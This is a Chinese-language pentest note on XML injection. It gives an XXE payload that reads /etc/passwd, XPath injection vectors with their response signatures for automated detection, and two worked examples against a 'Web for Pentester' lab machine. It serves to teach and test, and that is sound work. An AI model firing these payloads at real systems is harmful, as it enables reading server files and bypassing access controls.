XML注入攻击

1）  检测方法

通过爬取的url，获取参数（get/post/cookie）,并修改参数为

<%3Fxml version%3D"1.0"encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY nameSYSTEM"file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>

匹配对应返回特征

2）  测试向量

测试向量	返回特征
<%3Fxml version%3D"1.0" encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY name SYSTEM "file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>	/bin/bash
'or 1=1]/parent::*/child::node()%00	对比初始页面和返回页面，返回页面内容包含初始页面内容
“or 1=1]/parent::*/child::node()%00	对比初始页面和返回页面，返回页面内容包含初始页面内容

3）  示例

1.访问链接：http://192.168.7.121/xml/example1.php?xml=%3Ctest%3Ehacker%3C/test%3E

修改参数值hacker为

<%3Fxml version%3D"1.0"encoding%3D"UTF-8"%3F><!DOCTYPE UserInfo[<!ENTITY nameSYSTEM"file%3A%2f%2f%2fetc%2fpasswd">]><aa>%26name%3B<%2faa>

得到链接：

http://192.168.7.121/xml/example1.php?xml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20UserInfo%5B%3C%21ENTITY%20name%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Caa%3E%26name%3B%3C%2faa%3E

访问结果

2.访问链接：http://192.168.7.121/xml/example2.php?name=hacker

修改参数值hacker为

'or1=1]/parent::*/child::node()%00

得到链接:

http://192.168.7.121/xml/example2.php?name=%27or%201=1]/parent::*/child::node()%00

访问结果

靶站来自web for pentester